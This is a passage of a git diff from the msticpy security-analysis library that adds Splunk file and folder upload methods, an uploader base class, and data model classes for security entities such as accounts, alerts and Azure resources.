+            Host name to upload data with, default will be 'Upload'
+        create_index : bool, optional
+            Set this to true to create the index if it doesn't already exist. Default is False.
+
+        """
+        host = kwargs.get("host", None)
+        path = Path(file_path)
+        try:
+            data = pd.read_csv(path, delimiter=delim)
+        except (ParserError, UnicodeDecodeError) as parse_err:
+            raise MsticpyUserError(
+                "The file specified is not a seperated value file.",
+                "Incorrect file type.",
+            ) from parse_err
+
+        if not table_name:
+            table_name = path.stem
+        self._post_data(
+            data=data,
+            table_name=table_name,
+            index_name=index_name,
+            host=host,
+            create_index=create_index,
+        )
+
+    def upload_folder(  # type: ignore
+        self,
+        folder_path: str,
+        index_name: str,
+        table_name: str = None,
+        delim: str = ",",
+        create_index=False,
+        **kwargs,
+    ):
+        """
+        Upload all files in a folder to Splunk.
+
+        Parameters
+        ----------
+        folder_path : str
+            Path to folder to upload.
+        index_name : str
+            Name of the Splunk Index to add data to, if it doesn't exist it will be created.
+        table_name : str, optional
+            The souretype in Splunk data will be uploaded to, if not set the file name will be used.
+        delim : str, optional
+            Seperator value in files, by default ","
+        host : str, optional
+            Host name to upload data with, default will be 'Upload'
+        create_index : bool, optional
+            Set this to true to create the index if it doesn't already exist. Default is False.
+
+        """
+        host = kwargs.get("host", None)
+        glob_pat = kwargs.get("glob", "*")
+        t_name = bool(table_name)
+        input_files = Path(folder_path).glob(glob_pat)
+        f_progress = tqdm(total=len(list(input_files)), desc="Files", position=0)
+        for path in input_files:
+            try:
+                data = pd.read_csv(path, delimiter=delim)
+            except (ParserError, UnicodeDecodeError) as parse_err:
+                raise MsticpyUserError(
+                    "The file specified is not a seperated value file.",
+                    title="Incorrect file type.",
+                ) from parse_err
+            if not t_name:
+                table_name = path.stem
+            self._post_data(
+                data=data,
+                table_name=table_name,
+                index_name=index_name,
+                host=host,
+                create_index=create_index,
+            )
+            f_progress.update(1)
+            if self._debug is True:
+                print(f"{str(path)} uploaded to {table_name}")
+        f_progress.close()
+
+    # pylint: enable=arguments-differ
+
+    def _check_index(self, index_name: str):
+        """Check if index exists in Splunk host."""
+        service_list = [item.name for item in self.driver.service.indexes]
+        if index_name in service_list:
+            return True
+        return False
+
+    def _load_index(self, index_name, create: bool = True):
+        """Load specified Index or create if it doesn't exist."""
+        if self._check_index(index_name):
+            return self.driver.service.indexes[index_name]
+        if not self._check_index(index_name) and create:
+            return self.driver.service.indexes.create(index_name)
+
+        raise MsticpyConnectionError("Index not present in Splunk host.")
diff --git a/msticpy/data/uploaders/uploader_base.py b/msticpy/data/uploaders/uploader_base.py
new file mode 100644
index 000000000..b506b45d2
--- /dev/null
+++ b/msticpy/data/uploaders/uploader_base.py
@@ -0,0 +1,74 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data uploader base class."""
+import abc
+from abc import ABC
+import pandas as pd
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class UploaderBase(ABC):
+    """Base class for data providers."""
+
+    def __init__(self, **kwargs):
+        """Initialize new instance."""
+        self._kwargs = kwargs
+        self.workspace = None
+        self.workspace_secret = None
+        self._connected = False
+        self._debug = False
+
+    @abc.abstractmethod
+    def upload_file(self, file_path: str, table_name: str, delim: str = ",", **kwargs):
+        """
+        Upload a file to the data store.
+
+        Parameters
+        ----------
+        file_path : str
+            Path to the file to upload
+        table_name : str
+            The name of the table to upload the file to
+        delim : Optional[str]
+            Column deliminator in data file, default is ,
+
+        """
+
+    @abc.abstractmethod
+    def upload_folder(
+        self, folder_path: str, table_name: str = None, delim: str = ",", **kwargs
+    ):
+        """
+        Upload a folder of files to the data store.
+
+        Parameters
+        ----------
+        folder_path : str
+            Path to the folder of files to upload
+        table_name : Optional[str]
+            The name of the table to upload the file to, if not set file name is used as table name
+        delim : Optional[str]
+            Column deliminator in data file, default is ,
+
+        """
+
+    @abc.abstractmethod
+    def upload_df(self, data: pd.DataFrame, table_name: str, **kwargs):
+        """
+        Upload a Pandas DataFrame to the data store.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            The DataFrame to upload
+        table_name : str
+            The name of the table to upload the DataFrame to
+
+        """
diff --git a/msticpy/datamodel/__init__.py b/msticpy/datamodel/__init__.py
new file mode 100644
index 000000000..546949651
--- /dev/null
+++ b/msticpy/datamodel/__init__.py
@@ -0,0 +1 @@
+"""Package file for datamodel subpackage."""
diff --git a/msticpy/datamodel/entities/__init__.py b/msticpy/datamodel/entities/__init__.py
new file mode 100644
index 000000000..11710edcc
--- /dev/null
+++ b/msticpy/datamodel/entities/__init__.py
@@ -0,0 +1,119 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Entity sub-package."""
+import difflib
+
+from .account import Account
+from .alert import Alert
+from .azure_resource import AzureResource
+from .cloud_application import CloudApplication
+from .dns import Dns
+from .entity import Entity
+from .entity_enums import (  # noqa: F401
+    Algorithm,
+    ElevationToken,
+    OSFamily,
+    RegistryHive,
+)
+from .file import File
+from .file_hash import FileHash
+from .geo_location import GeoLocation
+from .host import Host
+from .host_logon_session import HostLogonSession
+from .iot_device import IoTDevice
+from .ip_address import IpAddress
+from .mailbox import Mailbox
+from .mail_cluster import MailCluster
+from .mail_message import MailMessage
+from .malware import Malware
+from .network_connection import NetworkConnection
+from .process import Process
+from .registry_key import RegistryKey
+from .registry_value import RegistryValue
+from .security_group import SecurityGroup
+from .submission_mail import SubmissionMail
+from .threat_intelligence import Threatintelligence
+from .unknown_entity import UnknownEntity
+from .url import Url
+from .cloud_logon_session import CloudLogonSession
+from ..soc.incident import Incident
+
+# Dictionary to map text names of types to the class.
+Entity.ENTITY_NAME_MAP.update(
+    {
+        "account": Account,
+        "azureresource": AzureResource,
+        "azure-resource": AzureResource,
+        "host": Host,
+        "process": Process,
+        "file": File,
+        "cloudapplication": CloudApplication,
+        "cloud-application": CloudApplication,
+        "dns": Dns,
+        "dnsresolve": Dns,
+        "ipaddress": IpAddress,
+        "iotdevice": IoTDevice,
+        "ip": IpAddress,
+        "networkconnection": NetworkConnection,
+        "network-connection": NetworkConnection,
+        "mailbox": Mailbox,
+        "mail-message": MailMessage,
+        "mailmessage": MailMessage,
+        "mail-cluster": MailCluster,
+        "mailcluster": MailCluster,
+        "malware": Malware,
+        "registry-key": RegistryKey,
+        "registrykey": RegistryKey,
+        "registry-value": RegistryValue,
+        "registryvalue": RegistryValue,
+        "host-logon-session": HostLogonSession,
+        "hostlogonsession": HostLogonSession,
+        "filehash": FileHash,
+        "security-group": SecurityGroup,
+        "securitygroup": SecurityGroup,
+        "SubmissionMail": SubmissionMail,
+        "alerts": Alert,
+        "alert": Alert,
+        "threatintelligence": Threatintelligence,
+        "url": Url,
+        "unknown": UnknownEntity,
+        "geolocation": GeoLocation,
+        "location": GeoLocation,
+        "incident": Incident,
+        "cloud-logon-session": CloudLogonSession,
+    }
+)
+
+
+def find_entity(entity):
+    """Find entity name."""
+    entity_cf = entity.casefold()
+    entity_classes = {
+        cls.__name__.casefold(): cls for cls in Entity.ENTITY_NAME_MAP.values()
+    }
+    if entity_cf in Entity.ENTITY_NAME_MAP:
+        print(f"Match found '{Entity.ENTITY_NAME_MAP[entity].__name__}'")
+        return Entity.ENTITY_NAME_MAP[entity]
+    if entity_cf in entity_classes:
+        print(f"Match found '{entity_classes[entity_cf].__name__}'")
+        return entity_classes[entity_cf]
+    # Try to find the closest matches
+    closest = difflib.get_close_matches(entity, entity_classes.keys(), cutoff=0.4)
+    mssg = [f"No exact match found for '{entity}'. "]
+    if len(closest) == 1:
+        mssg.append(f"Closest match is '{entity_classes[closest[0]].__name__}'")
+    elif closest:
+        match_list = [f"'{entity_classes[mtch].__name__}'" for mtch in closest]
+        mssg.append(f"Closest matches are {', '.join(match_list)}")
+    else:
+        mssg.extend(
+            [
+                "No close match found. Entities available:",
+                *(cls.__name__ for cls in entity_classes.values()),
+            ]
+        )
+    print("\n".join(mssg))
+    return None
diff --git a/msticpy/datamodel/entities/account.py b/msticpy/datamodel/entities/account.py
new file mode 100644
index 000000000..49dd55f8e
--- /dev/null
+++ b/msticpy/datamodel/entities/account.py
@@ -0,0 +1,211 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Account Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .host import Host
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class Account(Entity):
+    """
+    Account Entity class.
+
+    Attributes
+    ----------
+    Name : str
+        Account Name
+    NTDomain : str
+        Account NTDomain
+    UPNSuffix : str
+        Account UPNSuffix
+    Host : Host
+        Account Host
+    LogonId : str
+        Account LogonId (deprecated)
+    Sid : str
+        Account Sid
+    AadTenantId : str
+        Account AadTenantId
+    AadUserId : str
+        Account AadUserId
+    PUID : str
+        Account PUID
+    IsDomainJoined : bool
+        Account IsDomainJoined
+    DisplayName : str
+        Account DisplayName
+    ObjectGuid : str
+        The object ID of the user account
+
+    """
+
+    ID_PROPERTIES = ["QualifiedName", "Sid", "AadUserId", "PUID", "ObjectGuid"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        role: str = "subject",
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing Account entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+        role : str, optional
+            'subject' or 'target' - only relevant if the entity
+            is being constructed from an event.
+            (the default is 'subject')
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Name: Optional[str] = None
+        self.NTDomain: Optional[str] = None
+        self.UPNSuffix: Optional[str] = None
+        self.Host: Optional[Host] = None
+        self.LogonId: Optional[str] = None
+        self.Sid: Optional[str] = None
+        self.AadTenantId: Optional[str] = None
+        self.AadUserId: Optional[str] = None
+        self.PUID: Optional[str] = None
+        self.IsDomainJoined: bool = False
+        self.DisplayName: Optional[str] = None
+        self.ObjectGuid: Optional[str] = None
+
+        # pylint: disable=locally-disabled, line-too-long
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event is not None:
+            self._create_from_event(src_event, role)
+
+    # pylint: enable=locally-disabled, line-too-long
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.qualified_name
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Name or self.DisplayName or "Unknown Account"
+
+    @property
+    def qualified_name(self) -> str:
+        """Windows qualified account name."""
+        if "Name" not in self:
+            return ""
+        name = self["Name"]
+        if "NTDomain" in self and self.NTDomain:
+            return f"{self.NTDomain}\\{name}"
+        if "UPNSuffix" in self and self.UPNSuffix:
+            return f"{name}@{self.UPNSuffix}"
+        if "Host" in self and self.Host:
+            return f"{self.Host.HostName}\\{name}"
+        return name
+
+    def _create_from_event(self, src_event, role):
+        if "Name" in src_event:
+            self.Name = src_event["Name"]
+        if role == "subject" and "SubjectUserName" in src_event:
+            self.Name = src_event["SubjectUserName"]
+            self.NTDomain = (
+                src_event["SubjectUserDomain"]
+                if "SubjectUserDomain" in src_event
+                else None
+            )
+            self.Sid = (
+                src_event["SubjectUserSid"] if "SubjectUserSid" in src_event else None
+            )
+            self.LogonId = (
+                src_event["SubjectLogonId"] if "SubjectLogonId" in src_event else None
+            )
+        if role == "target" and "TargetUserName" in src_event:
+            self.Name = src_event["TargetUserName"]
+            self.NTDomain = (
+                src_event["TargetUserDomain"]
+                if "TargetUserDomain" in src_event
+                else None
+            )
+            self.Sid = (
+                src_event["TargetUserSid"] if "TargetUserSid" in src_event else None
+            )
+            self.LogonId = (
+                src_event["TargetLogonId"] if "TargetLogonId" in src_event else None
+            )
+
+        self.AadTenantId = (
+            src_event["AadTenantId"] if "AadTenantId" in src_event else None
+        )
+        self.Sid = src_event["Sid"] if "Sid" in src_event else None
+        self.NTDomain = src_event["NtDomain"] if "NtDomain" in src_event else None
+        self.AadUserId = src_event["AadUserId"] if "AadUserId" in src_event else None
+        self.PUID = src_event["PUID"] if "PUID" in src_event else None
+        if "DisplayName" in src_event:
+            self.DisplayName = src_event["DisplayName"]
+        elif "AccountName" in src_event:
+            self.DisplayName = src_event["AccountName"]
+        else:
+            self.DisplayName = None
+
+        if "UPNSuffix" in src_event:
+            self.UPNSuffix = src_event["UPNSuffix"]
+        elif "UpnSuffix" in src_event:
+            self.UPNSuffix = src_event["UpnSuffix"]
+        else:
+            self.UPNSuffix = None
+
+    _entity_schema = {
+        # Name (type System.String)
+        "Name": None,
+        # NTDomain (type System.String)
+        "NTDomain": None,
+        # UPNSuffix (type System.String)
+        "UPNSuffix": None,
+        # Host (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.Host)
+        "Host": "Host",
+        # LogonId (type System.String)
+        "LogonId": None,
+        # Sid (type System.String)
+        "Sid": None,
+        # AadTenantId (type System.Nullable`1[System.Guid])
+        "AadTenantId": None,
+        # AadUserId (type System.Nullable`1[System.Guid])
+        "AadUserId": None,
+        # PUID (type System.Nullable`1[System.Guid])
+        "PUID": None,
+        # IsDomainJoined (type System.Nullable`1[System.Boolean])
+        "IsDomainJoined": None,
+        # DisplayName (type System.String)
+        "DisplayName": None,
+        "ObjectGuid": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/alert.py b/msticpy/datamodel/entities/alert.py
new file mode 100644
index 000000000..f8be7b962
--- /dev/null
+++ b/msticpy/datamodel/entities/alert.py
@@ -0,0 +1,377 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Alert Entity class."""
+import json
+from datetime import datetime
+from typing import Any, Dict, List, Mapping, Optional, Tuple
+
+import pandas as pd
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity, camelcase_property_names
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Alert(Entity):
+    """
+    Alert Entity class.
+
+    Attributes
+    ----------
+    AlertDisplayName : str
+        Alert DisplayName
+    CompromisedEntity : str
+        Alert CompromisedEntity
+    Count : int
+        Alert Count
+    StartTimeUtc : datetime
+        Alert StartTime
+    EndTimeUtc : datetime
+        Alert EndTime
+    Severity : str
+        Alert Severity
+    SystemAlertIds : List[str]
+        Alert SystemAlertIds
+    AlertType : str
+        Alert AlertType
+    VendorName : str
+        Alert VendorName
+    ProviderName : str
+        Alert ProviderName
+
+    """
+
+    ID_PROPERTIES = ["SystemAlertIds"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.DisplayName: Optional[str] = None
+        self.CompromisedEntity: Optional[str] = None
+        self.Count: Any = None
+        self.StartTimeUtc: Optional[datetime] = None
+        self.EndTimeUtc: Optional[datetime] = None
+        self.Severity: Any = None
+        self.SystemAlertIds: List[str] = []
+        self.AlertType: Optional[str] = None
+        self.VendorName: Optional[str] = None
+        self.ProviderName: Optional[str] = None
+        self.Entities: Optional[List] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_entity:
+            self._create_from_ent(src_entity)
+
+        if isinstance(src_event, pd.Series) and not src_event.empty:
+            self._create_from_event(src_event)
+
+    def _create_from_ent(self, src_entity):  # noqa: MC0001
+        if "StartTime" in src_entity or "TimeGenerated" in src_entity:
+            self.TimeGeneratedUtc = (
+                src_entity["StartTime"] or src_entity["TimeGenerated"]
+            )
+        if "EndTime" in src_entity:
+            self.EndTimeUtc = src_entity["EndTime"]
+        if "StartTime" in src_entity:
+            self.StartTime = src_entity["StartTime"]
+        if "AlertDisplayName" in src_entity:
+            self.DisplayName = src_entity["AlertDisplayName"]
+        if "SystemAlertId" in src_entity:
+            self.SystemAlertIds.append(src_entity["SystemAlertId"])
+        elif "ID" in src_entity:
+            self.SystemAlertIds.append(src_entity["ID"])
+        if "Name" in src_entity:
+            self.DisplayName = src_entity["Name"]
+        if "Entities" in src_entity and src_entity["Entities"]:
+            if isinstance(src_entity["Entities"], str):
+                try:
+                    ents = _extract_entities(json.loads(src_entity["Entities"]))
+                except json.JSONDecodeError:
+                    ents = []
+            else:
+                ents = _extract_entities(src_entity["Entities"])
+            self.Entities = self._create_entities(ents)
+        self._add_additional_data(src_entity)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        if self.StartTime and self.CompromisedEntity:
+            return f"{self.DisplayName} ({self.StartTime}) {self.CompromisedEntity}"
+        else:
+            return f"{self.DisplayName} - {self.SystemAlertIds}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return f"Alert: {self.DisplayName}" or self.__class__.__name__
+
+    def _add_additional_data(self, src_entity: Mapping[str, Any]):
+        """Populate additional alert properties."""
+        if isinstance(src_entity, dict):
+            prop_list = src_entity.items()
+        elif type(src_entity).__name__ == "SecurityAlert":
+            prop_list = src_entity.properties.items()  # type: ignore
+        # pylint: disable=all
+        elif isinstance(src_entity, Mapping):
+            prop_list = src_entity.iteritems()  # type: ignore
+        # pylint: enable=all
+        else:
+            return
+
+        for prop_name, prop in prop_list:
+            if prop_name not in self._entity_schema:
+                self.AdditionalData[prop_name] = prop
+            elif prop_name not in self.__dict__:
+                self.__dict__[prop_name] = prop
+            else:
+                continue
+
+    def _create_from_event(self, src_event):
+        """Create Alert from an alert event."""
+        self.TimeGenerated = src_event.get("StartTime", src_event.get("TimeGenerated"))
+        self.AlertDisplayName = src_event.get(
+            "AlertDisplayName", src_event.get("DisplayName", src_event.get("Name"))
+        )
+        self.StartTimeUtc = src_event.get("StartTimeUtc", src_event.get("StartTime"))
+        self.EndTimeUtc = src_event.get("EndTimeUtc", src_event.get("EndTime"))
+        self.Severity = src_event.get("Severity", src_event.get("AlertSeverity"))
+        self.SystemAlertIds = src_event.get("SystemAlertId", src_event.get("ID"))
+        if isinstance(src_event["Entities"], str):
+            try:
+                ents = _extract_entities(json.loads(src_event["Entities"]))
+            except json.JSONDecodeError:
+                ents = []
+        else:
+            ents = _extract_entities(src_event["Entities"])
+        self.Entities = self._create_entities(ents)
+        for ent in self._entity_schema:
+            if ent not in self.__dict__:
+                self.__dict__[ent] = src_event.get(ent)
+        if "ExtendedProperties" in src_event:
+            ext_props = json.loads(src_event["ExtendedProperties"])
+            self._add_additional_data(ext_props)
+
+    _entity_schema = {
+        # CompromisedEntity (type String)
+        "CompromisedEntity": None,
+        # Count (type Int)
+        "Count": None,
+        # StartTimeUtc (type Datetime)
+        "StartTimeUtc": None,
+        # EndTimeUtc (type Datetime)
+        "EndTimeUtc": None,
+        # Severity (type String)
+        "Severity": None,
+        # SystemAlertIds (type String)
+        "SystemAlertId": None,
+        # AlertType (type System.String)
+        "AlertType": None,
+        # VendorName (type System.String)
+        "VendorName": None,
+        # ProviderName (type System.String)
+        "ProviderName": None,
+        # List of associated entities (type List)
+        "Entities": None,
+        # Time the alert was generated (type String)
+        "TimeGenerated": None,
+        # The product that generated the alert (type String)
+        "ProductName": None,
+        # The product component that generated the alert (type String)
+        "ProductComponentName": None,
+        # The version of the product generating the alert, if relevant (type String)
+        "ProductVersion": None,
+        # The time the alert was made available for consumption (type String)
+        "ProcessingEndTime": None,
+        # The life cycle status of the alert. This field is optional and all alerts would have the status (type String)
+        "Status": None,
+        # The alert provider or product internal life cycle status (type String)
+        "ProviderAlertStatus": None,
+        # The confidence level of this alert (type String)
+        "ConfidenceLevel": None,
+        # The confidence score of the alert (type Float)
+        "ConfidenceScore": None,
+        # The confidence score calculation status (type String)
+        "ConfidenceScoreStatus": None,
+        # A list of reasons for the confidence level of this alert (type List)
+        "ConfidenceReasons": None,
+        # The kill chain related intent behind the alert (type String)
+        "Intent": None,
+        # The kill chain related techniques behind the alert (type List)
+        "Techniques": None,
+        # The kill chain related sub-techniques behind the alert (type List)
+        "SubTechniques": None,
+        # If the alert is an incident or a regular alert (type Bool)
+        "IsIncident": None,
+        # If the alert is in preview (type Bool)
+        "IsPreview": None,
+        # Unique id for the specific alert instance set by the provider (type String)
+        "ProviderAlertId": None,
+        # Key to correlate multiple alerts together (type String)
+        "CorrelationKey": None,
+        # Identifiers of the Investigations created by the provider for the Alert (type List)
+        "InvestigationIds": None,
+        # The resource identifiers for this alert (type List)
+        "ResourceIdentifiers": None,
+        # Display name of the main entity being reported on (type String)
+        "CompromisedEntity": None,
+        # The display name of the alert (type String)
+        "AlertDisplayName": None,
+        # Alert description (type String)
+        "Description": None,
+        # Description arguments to build up Description field in placeholders (type Dict)
+        "DescriptionArguments": None,
+        # SupportingEvidence (type Dict)
+        "SupportingEvidence": None,
+        # Manual action items to take to remediate the alert (type List)
+        "RemediationSteps": None,
+        # A bag of fields which will be presented to the use (type Dict)
+        "ExtendedProperties": None,
+        # A bag for all links related to the alert (type Dict)
+        "ExtendedLinks": None,
+        # Metadata associated with the alert (type Dict)
+        "Metadata": None,
+        # A list of edges contained in this alert (type Dict)
+        "Edges": None,
+        # A direct link to view the specific alert in originating product portal (type String)
+        "AlertUri": None,
+        # Used to provide details about an anomaly in the data found by ML algorithms (type Dict)
+        "Anomaly": None,
+        # Used to provide details about a policy assocaited with the alert (type Dict)
+        "AlertPolicy": None,
+    }
+
+    def _create_entities(self, entities):
+        """Create alert entities from returned dicts."""
+        new_ents = []
+        for ent in entities:
+            if isinstance(ent, Tuple):
+                ent_details = ent[1]
+                ent_type = ent[0]
+            elif isinstance(ent, Dict):
+                ent_details = ent
+                ent_type = ent.get("Type", "Unknown")
+            else:
+                ent_details = ent
+                ent_type = "Unknown"
+            new_ent = camelcase_property_names(ent_details)
+            ent_obj = Entity.instantiate_entity(
+                new_ent, entity_type=Entity.ENTITY_NAME_MAP[ent_type.lower()]
+            )
+            new_ents.append(ent_obj)
+        return new_ents
+
+    def to_html(self) -> str:
+        """Return the item as HTML string."""
+        return (
+            """
+            <h3>Alert: '{name}'</h3>
+            <b>Alert_time:</b> {start},
+            <b>Compr_entity:</b> {entity},
+            <b>Alert_id:</b> {id}
+            """.format(
+                start=self.properties.get(
+                    "StartTimeUtc",
+                    self.properties.get("StartTime", "no timestamp"),
+                ),
+                name=self.properties.get(
+                    "AlertDisplayName",
+                    self.properties.get("DisplayName", "no alert name"),
+                ),
+                entity=self.properties.get("CompromisedEntity", "unknown"),
+                id=self.properties.get("SystemAlertId", "unknown"),
+            )
+            if self.properties
+            else "Alert has no data."
+        )
+
+
+def _extract_entities(ents: list):
+    """Extract all entities from a set and replace $ref elements."""
+    base_ents = _generate_base_ents(ents)
+    out_ents = []
+    for entity in ents:
+        if isinstance(entity, dict) and "$ref" in entity:
+            out_ents.append(_find_original_entity(entity, base_ents))
+        else:
+            for k, val in entity.items():
+                if isinstance(val, (list, dict)):
+                    if isinstance(val, list):
+                        nested_ents = []
+                        for item in val:
+                            if isinstance(item, dict) and "$ref" in item:
+                                nested_ents.append(
+                                    _find_original_entity(item, base_ents)
+                                )
+                                entity[k] = nested_ents
+                    elif isinstance(val, dict) and "$ref" in val:
+                        entity[k] = _find_original_entity(val, base_ents)
+            out_ents.append(entity)
+    return out_ents
+
+
+def _find_original_entity(ent, base_ents):
+    """Find the original entity referenced by $ref entity."""
+    try:
+        id = ent["$ref"]
+        return next(bent for bent in base_ents if ("$id" in bent) and bent["$id"] == id)
+    except StopIteration:
+        return ent
+
+
+def _generate_base_ents(ents: list) -> list:  # noqa: MC0001
+    """Generate a list of all enties form a set of nested entities."""
+    base_ents = []
+    for ent in ents:
+        base_ents.append(ent)
+        for _, item in ent.items():
+            if isinstance(item, list):
+                for prop in item:
+                    if isinstance(prop, dict) and "$id" in prop.keys():
+                        base_ents.append(prop)
+                        for val in prop:
+                            if isinstance(prop[val], list):
+                                for p in prop[val]:
+                                    if isinstance(p, dict) and "$id" in p.keys():
+                                        base_ents.append(p)
+                            elif (
+                                isinstance(prop[val], dict)
+                                and "$id" in prop[val].keys()
+                            ):
+                                base_ents.append(val)
+            elif isinstance(item, dict) and "$id" in item.keys():
+                base_ents.append(item)
+    return base_ents
diff --git a/msticpy/datamodel/entities/azure_resource.py b/msticpy/datamodel/entities/azure_resource.py
new file mode 100644
index 000000000..02a528ce5
--- /dev/null
+++ b/msticpy/datamodel/entities/azure_resource.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""AzureResource Entity class."""
+from itertools import islice
+import re
+from typing import Any, Dict, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+# pylint: disable=invalid-name
+
+
+@export
+class AzureResource(Entity):
+    """
+    AzureResource Entity class.
+
+    Attributes
+    ----------
+    ResourceId : str
+        AzureResource ResourceId
+    ResourceIdParts : Dict[str, str]
+        AzureResource ResourceIdParts
+
+    """
+
+    ID_PROPERTIES = ["ResourceId"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.ResourceId: Optional[str] = None
+        self.ResourceIdParts: Dict[str, str] = {}
+        self.Url: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+        if self.ResourceId and not self.ResourceIdParts:
+            self._extract_resource_parts()
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.ResourceId or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.ResourceId or self.__class__.__name__
+
+    @property
+    def SubscriptionId(self):  # noqa
+        """Return the subscription Id or None."""
+        return self.ResourceIdParts.get("subscriptions")
+
+    @property
+    def ResourceGroup(self):  # noqa
+        """Return the ResourceGroup name or None."""
+        return self.ResourceIdParts.get("resourceGroups")
+
+    @property
+    def Provider(self):  # noqa
+        """Return the Provider name or None."""
+        return self.ResourceIdParts.get("providers")
+
+    _entity_schema = {
+        # ResourceId (type System.String)
+        "ResourceId": None,
+        # ResourceIdParts (type System.Collections.Generic.IReadOnlyDictionary`2
+        # [System.String,System.String])
+        "ResourceIdParts": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
+
+    def _extract_resource_parts(self):
+        res_match = re.search("/resource/(?P<res_path>.+)", self.ResourceId)
+        if not res_match:
+            return
+        res_elems = res_match.groupdict().get("res_path", "").split("/")
+        keys = islice(res_elems, 0, len(res_elems), 2)
+        vals = islice(res_elems, 1, len(res_elems), 2)
+        self.ResourceIdParts = dict(zip(keys, vals))
diff --git a/msticpy/datamodel/entities/cloud_application.py b/msticpy/datamodel/entities/cloud_application.py
new file mode 100644
index 000000000..d1aa5fbc6
--- /dev/null
+++ b/msticpy/datamodel/entities/cloud_application.py
@@ -0,0 +1,79 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""CloudApplication Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class CloudApplication(Entity):
+    """
+    CloudApplication Entity class.
+
+    Attributes
+    ----------
+    Name : str
+        CloudApplication Name
+    AppId : str
+        The AppId of the cloud application
+    InstanceName : str
+        The instance name of the application
+
+    """
+
+    ID_PROPERTIES = ["Name"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Name: Optional[str] = None
+        self.AppId: Optional[str] = None
+        self.InstanceName: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.Name or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Name or self.__class__.__name__
+
+    _entity_schema = {
+        # Name (type System.String)
+        "Name": None,
+        "AppId": None,
+        "InstanceName": None,
+        "TimeGenerated": None,
